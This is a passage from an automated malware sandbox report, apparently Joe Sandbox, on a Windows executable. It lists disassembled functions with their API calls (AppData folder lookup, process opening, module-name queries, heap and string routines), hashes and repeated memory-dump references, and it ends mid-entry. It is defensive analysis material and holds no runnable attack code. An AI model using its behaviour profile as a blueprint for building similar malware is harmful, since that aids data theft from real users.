                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strlen
                                  • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 39653677-4138519520
                                  • Opcode ID: 5f53af8e1080714cd787092596421f5f41c99587b5eea2df7e99b4463b6f2322
                                  • Instruction ID: fc418ab4bdb0cadb4987f52c9c02e351ccc63e0f6a869789c2df257a32b6f732
                                  • Opcode Fuzzy Hash: 5f53af8e1080714cd787092596421f5f41c99587b5eea2df7e99b4463b6f2322
                                  • Instruction Fuzzy Hash: 8521A035510299AFC722EB35EC847EFF367EF80361F85C156D8180B241E332290AD796
                                  Function 0031EB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0031EBB4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031EBE3
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031EBF1
                                  • lstrcat.KERNEL32(?,0102E000), ref: 0031EC0C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: 7b5a9e6998d0ba03d2ac0f63a4133084c7243ffd0e13073049dfc805d71f5fb3
                                  • Instruction ID: a49a9d4927325d36a667a94492fe2d59db8ca2a76e39ac9e46c1fbf168158374
                                  • Opcode Fuzzy Hash: 7b5a9e6998d0ba03d2ac0f63a4133084c7243ffd0e13073049dfc805d71f5fb3
                                  • Instruction Fuzzy Hash: 9D31BB71A1111D9BCB26EF68DC55BEE77B4FF58300F1044A8BA06DB390DE709E988B90
                                  Function 00322B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0032A3D0,000000FF), ref: 00322B8F
                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00322B96
                                  • GetLocalTime.KERNEL32(?,?,00000000,0032A3D0,000000FF), ref: 00322BA2
                                  • wsprintfA.USER32 ref: 00322BCE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: 7aef96dbef1987d2c0884f25736fead38ef83bcae8d3c86deb6ec569bf4cd1d0
                                  • Instruction ID: 3d6da87079207444fc29cb7be5c18165632e9e04843cd5810901b54871c5a4f2
                                  • Opcode Fuzzy Hash: 7aef96dbef1987d2c0884f25736fead38ef83bcae8d3c86deb6ec569bf4cd1d0
                                  • Instruction Fuzzy Hash: 430152B2904628ABCB149BC9DD49FBFB7BCFB4CB11F00011AF645A2280E7B85544D7B1
                                  Function 00324480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000), ref: 00324492
                                  • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 003244AD
                                  • CloseHandle.KERNEL32(00000000), ref: 003244B4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003244E7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                  • String ID:
                                  • API String ID: 4028989146-0
                                  • Opcode ID: 17eadde2b389abe47c655c3a24238736dcdec9e3ce126883c9279ed625eb606d
                                  • Instruction ID: d15c563868febbde59f2ffc48b775b706a097d616c4e9abda920c625035f3d9e
                                  • Opcode Fuzzy Hash: 17eadde2b389abe47c655c3a24238736dcdec9e3ce126883c9279ed625eb606d
                                  • Instruction Fuzzy Hash: 05F0FCF09016256BE721AB75AC4DBE676A8AF14304F014591FA45D7280DBF09C84CBD0
                                  Function 00328FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 00328FDD
                                    • Part of subcall function 003287FF: __amsg_exit.LIBCMT ref: 0032880F
                                  • __getptd.LIBCMT ref: 00328FF4
                                  • __amsg_exit.LIBCMT ref: 00329002
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00329026
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 7267a295ace807064dfaf1a50547ff591d01cde7bf41bc93b0a25a3365bae6d8
                                  • Instruction ID: 02c6b89c59a430aea96a98c5afebd0820102e49ad3eccc16729614981e11bca5
                                  • Opcode Fuzzy Hash: 7267a295ace807064dfaf1a50547ff591d01cde7bf41bc93b0a25a3365bae6d8
                                  • Instruction Fuzzy Hash: 93F0B4329097349BEB63BB7CB807B5D33A07F00B20F25810AF444AF6D2DF645900EA59
                                  Function 00327310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(------,00305BEB), ref: 0032731B
                                  • lstrcpy.KERNEL32(00000000), ref: 0032733F
                                  • lstrcat.KERNEL32(?,------), ref: 00327349
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrcpylstrlen
                                  • String ID: ------
                                  • API String ID: 3050337572-882505780
                                  • Opcode ID: e13aabb6fb2e841a7f9d69d78998c7c4f72ba6ebd9342824043b1eeb1868e5be
                                  • Instruction ID: 70cd1f6eb1298af1047a7afecfed6dbffdfca7f5980d9c0e6258f355194da4f3
                                  • Opcode Fuzzy Hash: e13aabb6fb2e841a7f9d69d78998c7c4f72ba6ebd9342824043b1eeb1868e5be
                                  • Instruction Fuzzy Hash: 46F039B89013128FCB299F35E898927BAF8EF95700318882DA89AC7314EB30D840DB50
                                  Function 003133D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301557
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301579
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 0030159B
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 003015FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00313422
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031344B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00313471
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00313497
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 3e34532ebd68c0a6447b4cd6c8804d3d838b7460e4a16e3a24b6828017816aa1
                                  • Instruction ID: 86966375f029477d6e285bbe8d556a0782b77e9e850f6efe2b1492197a40951e
                                  • Opcode Fuzzy Hash: 3e34532ebd68c0a6447b4cd6c8804d3d838b7460e4a16e3a24b6828017816aa1
                                  • Instruction Fuzzy Hash: 9B12DDB0A012018FDB1ECF19C554B65B7E5AF49718B1AC0ADE809DB3A2D772DD82DF80
                                  Function 00317C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00317C94
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00317CAF
                                    • Part of subcall function 00317D40: std::_Xinvalid_argument.LIBCPMT ref: 00317D58
                                    • Part of subcall function 00317D40: std::_Xinvalid_argument.LIBCPMT ref: 00317D76
                                    • Part of subcall function 00317D40: std::_Xinvalid_argument.LIBCPMT ref: 00317D91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: string too long
                                  • API String ID: 909987262-2556327735
                                  • Opcode ID: dbd423ac9b0d8fa891c35dd16b360dde918d562b46d2a8a15d1f46c6d9c1609b
                                  • Instruction ID: eec7903490ab68caf8e8b10a5e93f27108cea7ce806921d618664b509574b6ec
                                  • Opcode Fuzzy Hash: dbd423ac9b0d8fa891c35dd16b360dde918d562b46d2a8a15d1f46c6d9c1609b
                                  • Instruction Fuzzy Hash: B631EB723086144BD73ADE6CE8C09EAF7F9DF99760B29452AF5428B641C7719CC183D4
                                  Function 00306EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 00306F74
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00306F7B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID: @
                                  • API String ID: 1357844191-2766056989
                                  • Opcode ID: e04ea96521dd2b4250e80ebf56d76760f2ee8bc1650b665682bc16f8c8d2309c
                                  • Instruction ID: 4b2ef8936637a35b2c0ed29955a020ea33d01211bade3e62e8a5072479360eaa
                                  • Opcode Fuzzy Hash: e04ea96521dd2b4250e80ebf56d76760f2ee8bc1650b665682bc16f8c8d2309c
                                  • Instruction Fuzzy Hash: B221AEB16006028BEB218B20DC95BB673E8EB40705F444878F946CB6C8FBB8E945C760
                                  Function 00301530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00301610: lstrcpy.KERNEL32(00000000), ref: 0030162D
                                    • Part of subcall function 00301610: lstrcpy.KERNEL32(00000000,?), ref: 0030164F
                                    • Part of subcall function 00301610: lstrcpy.KERNEL32(00000000,?), ref: 00301671
                                    • Part of subcall function 00301610: lstrcpy.KERNEL32(00000000,?), ref: 00301693
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301557
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301579
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030159B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003015FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 51b415bf682cb7b6fea63223d7ce04f2e9164bf6466519d42dd9763f1de1d78c
                                  • Instruction ID: ded0956470ed33bae2765a5b6b29b7c6dd7cafc16d973cf68d07094eb693bae4
                                  • Opcode Fuzzy Hash: 51b415bf682cb7b6fea63223d7ce04f2e9164bf6466519d42dd9763f1de1d78c
                                  • Instruction Fuzzy Hash: F631D6B5A02B029FC725DF7AC598953BBF5BF49300704492DA896C7B50DB70F811CB80
                                  Function 00321570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 003215A1
